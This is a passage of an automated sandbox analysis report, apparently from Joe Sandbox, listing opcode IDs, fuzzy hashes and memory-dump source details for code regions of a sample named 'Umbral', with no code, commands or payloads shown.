                                        • Instruction ID: 37332b8c34278564f2b7c372de8cf43acf7c14b2d7fa186ef0512c3a4d8cc9d1
                                        • Opcode Fuzzy Hash: a0705f5937b32754a0e044e8fae542b554eb43dce0180b807f4b43ea02770ff0
                                        • Instruction Fuzzy Hash: 7C619F3060CB098FD798EB1CD449A7573E1FF99750F1401BAE44EC72A6DF25AC828785
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3843a4ab82789e0a1cde6faa43475763f017419ff0a42c4af9131a3dfaad11c4
                                        • Instruction ID: e71ce0524a13d714b524c310f8ec0d354c259f6d8f5b7a0006ca9c9ad93198df
                                        • Opcode Fuzzy Hash: 3843a4ab82789e0a1cde6faa43475763f017419ff0a42c4af9131a3dfaad11c4
                                        • Instruction Fuzzy Hash: F571E071D1CE4A5FE79CEB2890456B277E1FBAA350F0486BEC04EC3296DF35A4068785
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2a653ca53eaf6e4404cbc24521e7bc9f5a45445311a9e6241489b5f5f44d6a54
                                        • Instruction ID: 0676f4c2b312e1e03a5ce0731a35b7e6c6e1b5e2be0eb2c5670b4243001dcd62
                                        • Opcode Fuzzy Hash: 2a653ca53eaf6e4404cbc24521e7bc9f5a45445311a9e6241489b5f5f44d6a54
                                        • Instruction Fuzzy Hash: 68711430A0CA495FDB49FB2894419B9BBE1FF59350F1401ADE44AC72A3CB79BC82C795
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0837d8fc94b655475759ca2b2a21679f2a9850659fff64b6d279e03acbd7f652
                                        • Instruction ID: 81576f23a800f1bf4784b2a3994a703462be65e78013aea27d6768dd2ca13d98
                                        • Opcode Fuzzy Hash: 0837d8fc94b655475759ca2b2a21679f2a9850659fff64b6d279e03acbd7f652
                                        • Instruction Fuzzy Hash: D7610372D0CB5C8FDB58EB5CA8452F8BBE0FF95321F0442BBD04987252DA346845CB92
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 34f17df2036b0378be26e9df7bb9611c383177e609b260c9b6fb80eab54a2849
                                        • Instruction ID: cd5211e47277d725adc7300b5ce26c76594e2f2643db1ec671ffa636581573bf
                                        • Opcode Fuzzy Hash: 34f17df2036b0378be26e9df7bb9611c383177e609b260c9b6fb80eab54a2849
                                        • Instruction Fuzzy Hash: DD711E31D0CB898FDB58EB6898452F9BBE1FF95311F0442BBD04D87292DB346845CB82
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6cc617b0c7402147fa15d6de2317841d56ec7a93866c8c0e7554137b805f3d3d
                                        • Instruction ID: 64b2c505c47f069c042d98192f68c2954b8a7e8994f203fc83f79d339637abcc
                                        • Opcode Fuzzy Hash: 6cc617b0c7402147fa15d6de2317841d56ec7a93866c8c0e7554137b805f3d3d
                                        • Instruction Fuzzy Hash: 5E614C3190DA894FE355A73458161FDBBE0FF86390F4801FAD44CC7093DB39691A8786
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7610e5d1db304842c4b06ec15119f285e017b936a9f501a0cb6791182b019410
                                        • Instruction ID: 0156d474a40ea46f049e286522ae838d3b02f802b14240f7af97e661a87275e0
                                        • Opcode Fuzzy Hash: 7610e5d1db304842c4b06ec15119f285e017b936a9f501a0cb6791182b019410
                                        • Instruction Fuzzy Hash: 2851CC31E1CD064FE768F61CA44557973D2FBA87A0F14427ED84EC32DADE35AC424689
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 194f1cfb3e3410ead560d940af83b072bbf26a71bc036438f29b273c656bfa03
                                        • Instruction ID: 5f5e09f32497486b6b8cfeed56bc2505129129cd632a1bc3a5449100f981e747
                                        • Opcode Fuzzy Hash: 194f1cfb3e3410ead560d940af83b072bbf26a71bc036438f29b273c656bfa03
                                        • Instruction Fuzzy Hash: 66510423F0D9965FE719BBBCA8651F9BB90FF913A1F0801B7D148C7183DE2864068799
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: daff55fcf180bdcb7670de82cfae3e3cdf17f52705cc37ab1dff2f0efa0a1a3f
                                        • Instruction ID: 453dbce7d6b896776b2e2b8045db27161a0973431f585eacb4ad5e76cade7786
                                        • Opcode Fuzzy Hash: daff55fcf180bdcb7670de82cfae3e3cdf17f52705cc37ab1dff2f0efa0a1a3f
                                        • Instruction Fuzzy Hash: 8F618C30A1CA498FDB98EB2CC449A7577E1FFA9350F04057EE44AC72A2DF34B8428785
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7ce045d1339f805b50c8c4efa48b7a447472db8f6beb33becd3a133b356a3a0
                                        • Instruction ID: 90a21a02990388984470688365adde6baeb555e7ce134d56090737ee80900bb0
                                        • Opcode Fuzzy Hash: d7ce045d1339f805b50c8c4efa48b7a447472db8f6beb33becd3a133b356a3a0
                                        • Instruction Fuzzy Hash: EE51E322E2CD8A1FEB9DB67854591B977D3FF95298B0C81B6C44AC7187EF28A8074300
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f882652ca44ee94160d5061ae1028e2ae1e1977440796c14ad9ba6e2184f9d3d
                                        • Instruction ID: 9cf368ef76a1ac99ff782a75a66c5bacb0c76ae400726720f26b9f06b2c362f9
                                        • Opcode Fuzzy Hash: f882652ca44ee94160d5061ae1028e2ae1e1977440796c14ad9ba6e2184f9d3d
                                        • Instruction Fuzzy Hash: 5F512532D0CA8A1FE766B73898151ED7FE0FF46391F4901BBD448C70D3DA28591A8B82
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 349b18212f318af32c245d67b72ea5edbe5c12e75b9236e9c1bb33806b9c7893
                                        • Instruction ID: 70ea418cf8cf7badbdffce0cfaf8a2487e29b06188fcc664d8aad54d69134803
                                        • Opcode Fuzzy Hash: 349b18212f318af32c245d67b72ea5edbe5c12e75b9236e9c1bb33806b9c7893
                                        • Instruction Fuzzy Hash: 8B51153280DA894FE765A73498151FD7FE0FF463A1F8901BAD44DC70A3DF28291A8796
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a4f704d861de3c6586c68b86227d06a168bc36946ca76d8935f6a87b62efcddb
                                        • Instruction ID: b7c3344f95043afd154f558dc5b6690f5f18376a6d5c050c95183886d95a8473
                                        • Opcode Fuzzy Hash: a4f704d861de3c6586c68b86227d06a168bc36946ca76d8935f6a87b62efcddb
                                        • Instruction Fuzzy Hash: 76513632C0DA994FE765B7349C155EDBBE0FF46390F8501BAD45CC70A3DB29291A8782
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d032b1493500f0c1f2fb3eeb0c07992e9c02cf14409366be94ced089006534b8
                                        • Instruction ID: 2ee567c3875640b5500124fbcf70378efd2e30ed1735bb15800c1514b1188362
                                        • Opcode Fuzzy Hash: d032b1493500f0c1f2fb3eeb0c07992e9c02cf14409366be94ced089006534b8
                                        • Instruction Fuzzy Hash: E951143280DA8A8FE765A77458152F97BE0FF46394F0501FAD45CC7093EB6D291A8386
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3bc696e7200f74767e17e51cd10e95e0d7390df5e78578f0e182f6470e615b43
                                        • Instruction ID: a57647cfd23874b57670ca9177029511e631757b9036bcbc5120aab53b01a184
                                        • Opcode Fuzzy Hash: 3bc696e7200f74767e17e51cd10e95e0d7390df5e78578f0e182f6470e615b43
                                        • Instruction Fuzzy Hash: AC710F34618A4E8FDBC8EF1CC494AA973E2FF58344F6455A8D41DC729ADB35E852CB40
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e8eba5d3c363b362daf2b8504b41dab66d20b8644b8fbca83460f2222f83d33e
                                        • Instruction ID: 9c68dd8313390451a35b197c0b38a541570c2bc982fc4792dec5ea64a89b2b9c
                                        • Opcode Fuzzy Hash: e8eba5d3c363b362daf2b8504b41dab66d20b8644b8fbca83460f2222f83d33e
                                        • Instruction Fuzzy Hash: 24617C30608A4E8FDB85EF1CC894AE9B3E1FF5D784F5142A5E419CB296CF35E8528B44
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 00ea4d21a7d91bd55f3d4d7769bc8f031fc3a16fa3a6056c4750e01e5f5d96df
                                        • Instruction ID: 6b2364d8bcfbcf8ad131c18e6f9947dd032ffe7d173de48ba160446eea5c7298
                                        • Opcode Fuzzy Hash: 00ea4d21a7d91bd55f3d4d7769bc8f031fc3a16fa3a6056c4750e01e5f5d96df
                                        • Instruction Fuzzy Hash: 1251A671B1C71C4F9B58AA5CA8461BD77E1FB99721F10023FE88AC3211DB31B85386C6
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 47cb0aedc0f619e98855db28b9bc44f580226af7c42fbc64ff821ed523e3a2a5
                                        • Instruction ID: 9300d69474dbbf76336974a0fa99e6b04ee5f65a4c0f9c104c5c52faf5c769de
                                        • Opcode Fuzzy Hash: 47cb0aedc0f619e98855db28b9bc44f580226af7c42fbc64ff821ed523e3a2a5
                                        • Instruction Fuzzy Hash: 39516E3060CB099FDB98EB18D448A7577E1FF99750F1401BAE44EC72A6DF25AC828745
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 958046964c91ce370a669294efcdff9d9485367135d98b2882c4e78e32e6502f
                                        • Instruction ID: ebaf898d96d98ea1da1216f0134bbb8a687dcb9361db3952e16664d43d007a1d
                                        • Opcode Fuzzy Hash: 958046964c91ce370a669294efcdff9d9485367135d98b2882c4e78e32e6502f
                                        • Instruction Fuzzy Hash: 5D511531B1DE494FE794FB2C885827577D2FFA8391B1841BAD00EC72A6DE35AC428744
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 39266b3785dfb746fa438e2156bf44d2a029aa3118486974fc762ff2aeac381c
                                        • Instruction ID: 0fb8bdceab89d96b1e237bf8d060cddf72f6acb2938e50589ac42a4568570513
                                        • Opcode Fuzzy Hash: 39266b3785dfb746fa438e2156bf44d2a029aa3118486974fc762ff2aeac381c
                                        • Instruction Fuzzy Hash: EB518A70A1CA498FDB98EE28D094A7673E1FBA8340F50017EE44FC76A6DE35E8428745
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4eeebdc96ce5a5ac87fe8098306afca85a5693a1bc134484ba576649433ebf87
                                        • Instruction ID: b9483a9fab75d75b97f3e3da1be1a55be261b29508262e86a4a42cd1d39a1986
                                        • Opcode Fuzzy Hash: 4eeebdc96ce5a5ac87fe8098306afca85a5693a1bc134484ba576649433ebf87
                                        • Instruction Fuzzy Hash: FE518331E0CA4A8FEB58EB6898556BDB7F2FF98350F14017AD04DE3282DF3968028755
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4db7abde04e6a93111f68f74d66ea4eca3f942479314e838b6b8e19ae2bd7f5a
                                        • Instruction ID: 4b7fd37a8b5edda46032850a546546099d556bb9cd1d9c767699a0d264991b07
                                        • Opcode Fuzzy Hash: 4db7abde04e6a93111f68f74d66ea4eca3f942479314e838b6b8e19ae2bd7f5a
                                        • Instruction Fuzzy Hash: 3F317121B1CE1A4FEBA8F56D949967527C1FBBD7A1F1001BAD80DC3396DE25AC424388
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 752eeb5f80953468a715a71e6060cefafadef90c70d8ef265cbddcfcb285d687
                                        • Instruction ID: 4d12f312ef47c7d3ab830d034d1c26ffe2d551f4671ce2dbf3cd327fa52a4981
                                        • Opcode Fuzzy Hash: 752eeb5f80953468a715a71e6060cefafadef90c70d8ef265cbddcfcb285d687
                                        • Instruction Fuzzy Hash: D0411C6248E7C24FD353837098355927FB0AE93224B0E46EFD4C0CF4A3E1495A4AC363
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e847a5b8ba1742ccd05f991f9f2237ad38bc95a872cc6cfa07413a1f66e7e7cd
                                        • Instruction ID: 2847a414a0ceaf25d8364aa56eba6e9354d6bdf6cf7bde9c89b2a2f3ea19928a
                                        • Opcode Fuzzy Hash: e847a5b8ba1742ccd05f991f9f2237ad38bc95a872cc6cfa07413a1f66e7e7cd
                                        • Instruction Fuzzy Hash: E731D631B1D8094FEAE4FA2C685877563D2FFAC790F4401B6D60EC7296EE29DC468740
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e50f5f70cde04be24b57d7923142fe9a3c911bd9fd20e8f0aff41d6b2549d267
                                        • Instruction ID: 8093c8db5d5bceb0308ea387fc731123a3458299a9602b35120e94039a6c9f08
                                        • Opcode Fuzzy Hash: e50f5f70cde04be24b57d7923142fe9a3c911bd9fd20e8f0aff41d6b2549d267
                                        • Instruction Fuzzy Hash: 44310331A1DE861FD76ABA2C94414B677E0FF66350B0441BFD04EC31E7DE29A84A8399
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d85f6c3b2264efa6e4066b920068601ab92b04acd2a9c08dc1f9ce7852116cfb
                                        • Instruction ID: 5587907f8b2ac8215375daf1066ac5956603bbd5e639994ca2369b4c59e81a14
                                        • Opcode Fuzzy Hash: d85f6c3b2264efa6e4066b920068601ab92b04acd2a9c08dc1f9ce7852116cfb
                                        • Instruction Fuzzy Hash: 1D410270608A4E8FDB88EF28C494AA973E2FF98345B605569D81EC7295CF31E852CB40
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7672857b31d3d8d5e02740ac1bc6912b682cf8edfaf1ea463a36b5e51c1b56cc
                                        • Instruction ID: e166ae9aed8771871a0c6a6e27c439bb999cc54539f73e18ba13eeb481b398b1
                                        • Opcode Fuzzy Hash: 7672857b31d3d8d5e02740ac1bc6912b682cf8edfaf1ea463a36b5e51c1b56cc
                                        • Instruction Fuzzy Hash: 15312431A0CE412EE74CE61CA4425FA77D0FFA9364F0450BEF08E831D7DE25A846439A
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6e05270d596523596be8a77d9c2e6699e43d91004e572b5b0804d6a9d027ce1f
                                        • Instruction ID: 83e27e4a6aba4fcd0f41ef1e52f31494607710ce3055dfacd6d1524470c42310
                                        • Opcode Fuzzy Hash: 6e05270d596523596be8a77d9c2e6699e43d91004e572b5b0804d6a9d027ce1f
                                        • Instruction Fuzzy Hash: FD214D62E1DD8A2FE759B63868555F937A0FF96760F0402FBD00DC3087EE29AD068395
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d474fe1c67e31602dc8b800b9c941e532c5a47fbe9c3fc07a7e0bb247a7f74a4
                                        • Instruction ID: c24c1b19ad0c5a03752aaead1e610db9dfa1595a8663c977dfcd14860f1bff18
                                        • Opcode Fuzzy Hash: d474fe1c67e31602dc8b800b9c941e532c5a47fbe9c3fc07a7e0bb247a7f74a4
                                        • Instruction Fuzzy Hash: CA312921E0DD8A5FEB48BB7C58156B9BBD1FF55350F0841BAD04DC31C7DE2858058755
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 387f3bd03dfd59cf1bf93f805721707f6cdb8f95e73ba4b2f300904636bdfcb1
                                        • Instruction ID: 0b32b1b522875701931d856216e21529b90d49d772aad65d8ad7f721d1b42429
                                        • Opcode Fuzzy Hash: 387f3bd03dfd59cf1bf93f805721707f6cdb8f95e73ba4b2f300904636bdfcb1
                                        • Instruction Fuzzy Hash: D7217C52E5DDC62FE7596238285A5F93BD0EF96660F0802FBD049C3087EE1D9C078351
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65954b2cf9d598f24b6a41a5d2641bbeb8edf3d2c8cf4f541b8a3871708e8de0
                                        • Instruction ID: a8098ecb1d5e42e0f1bfad01caffb08ff53255e7c4ec3c4534a8139184ac5ff8
                                        • Opcode Fuzzy Hash: 65954b2cf9d598f24b6a41a5d2641bbeb8edf3d2c8cf4f541b8a3871708e8de0
                                        • Instruction Fuzzy Hash: C631F222E0D98A4FEB49AB7C48192B5BBE1FF95350F0801FBD04DC71D7DE2898068752
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e4f720e7acda00c0534923fb28b4a791b922966dcd2eb3148b7dfcaa584ff5a
                                        • Instruction ID: 89f69551d547321bc7996cb9d62035f3e1450b6a140812d00af699d0af9930c0
                                        • Opcode Fuzzy Hash: 7e4f720e7acda00c0534923fb28b4a791b922966dcd2eb3148b7dfcaa584ff5a
                                        • Instruction Fuzzy Hash: E121A731B1C91A0FF3A8E51CB84A6B573D1FBA5665F14017BD44DC3159EE26AC524284
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6f13a859e5a29d9c8dcfae89b849cf837300bf7290518dd7107c67984c63c345
                                        • Instruction ID: 7cb605a2453e54b41f59923f4765ab95bcac35eff13753967154c8f7632206d3
                                        • Opcode Fuzzy Hash: 6f13a859e5a29d9c8dcfae89b849cf837300bf7290518dd7107c67984c63c345
                                        • Instruction Fuzzy Hash: 4B315A7161CE1A8FDBA4EA1DD085A66B3E0FFA9350F500179E44EC36A2DB34FC458B84
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0337da4ef71c65300fa08fc651246f345c99337943bdaf8f42e2ae806694d713
                                        • Instruction ID: 73dcc4a0c60f0be658c2df16ada2d48c1e8aca1bba814469fe579c129c60d68b
                                        • Opcode Fuzzy Hash: 0337da4ef71c65300fa08fc651246f345c99337943bdaf8f42e2ae806694d713
                                        • Instruction Fuzzy Hash: 1631CF21E1CA8A8FEB95FB6888116B97BB2FF45780F4404F6D449C71E3CF38A9048355
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 210dfb6d1fd28e380fd48aa2d734076465878482cb208e2f3ee62883bb88ce56
                                        • Instruction ID: 609c5c09ec3f363450b33f1d30fcf600d255c3421295ec225e97335eb8799c23
                                        • Opcode Fuzzy Hash: 210dfb6d1fd28e380fd48aa2d734076465878482cb208e2f3ee62883bb88ce56
                                        • Instruction Fuzzy Hash: D631473060CA498FDBA4FB28C444B6573E1FFA9355F5005B9E84EC72A6CB75E881C744
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: be3638eb82625026f98ea3d616b913899ba310083e341fc5c3778783d051576d
                                        • Instruction ID: 764ac720569bfeb99d3f4e3074f127cea9cf53c24b86a658f16337e563c5b535
                                        • Opcode Fuzzy Hash: be3638eb82625026f98ea3d616b913899ba310083e341fc5c3778783d051576d
                                        • Instruction Fuzzy Hash: FC31F721F19C8A5FEB88BB7C98196B5B7D1FF94790F0842BAD04DC71C7DE2898028751
                                        Memory Dump Source
                                        • Source File: 0000000E.00000002.2683058381.00007FF848E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E70000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_14_2_7ff848e70000_Umbral.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0ebce0baefe141bb18cd2203c361674c87b9a65089b98c939a210136e77ddc47
                                        • Instruction ID: b454079500d39eaf21c00b7ac4740c2aadc8a22a641c3ecda8e3049f8a06773b
                                        • Opcode Fuzzy Hash: 0ebce0baefe141bb18cd2203c361674c87b9a65089b98c939a210136e77ddc47
